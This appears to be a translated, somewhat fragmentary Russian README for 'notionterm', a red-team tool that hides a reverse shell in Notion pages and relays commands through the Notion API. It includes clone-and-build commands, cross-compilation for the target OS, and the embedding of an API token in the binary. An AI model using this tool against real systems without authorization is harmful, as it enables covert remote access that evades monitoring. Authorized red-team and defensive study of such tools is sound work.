
Встраивание обратной оболочки в страницы Notion с использованием Notion API в качестве прокси, что обеспечивает скрытные сеансы удаленной оболочки с зашифрованным и аутентифицированным взаимодействием для операций красной команды.

notionterm на целевой машине.
примерно вдохновлено отличной идеей OffensiveNotion и notionion!
Изучать команды и флаги слишком скучно: Используйте wrap-notionterm.sh
notionterm и перенесите его на целевую машину (см. Сборка)Существует 3 основных способа запуска notionterm:
notionterm [флаги]
ON, делайте свои дела с обратной оболочкой, выключите OFF для паузы, снова включите ON для возобновления и т.д...
notionterm --server [флаги]
CTRL+L для его получения): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light
notionterm light [флаги]
Поскольку notionterm предназначен для запуска на целевой машине, его необходимо собирать под неё.
Таким образом, установите переменные окружения в соответствии с требованиями целевой системы:
GOOS=[windows/linux/darwin]
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
Вам потребуется указать API-ключ и URL страницы Notion с помощью переменных окружения (NOTION_TOKEN и NOTION_PAGE_URL) или флагов (--token и --page-url)
Встраивание API-токена интеграции Notion и URL страницы Notion непосредственно в бинарный файл. ⚠️ Любой, имеющий доступ к бинарному файлу, сможет извлечь токен. Из соображений безопасности не распространяйте его и удалите после использования.
Установите соответствующие переменные окружения:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
И соберите:
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS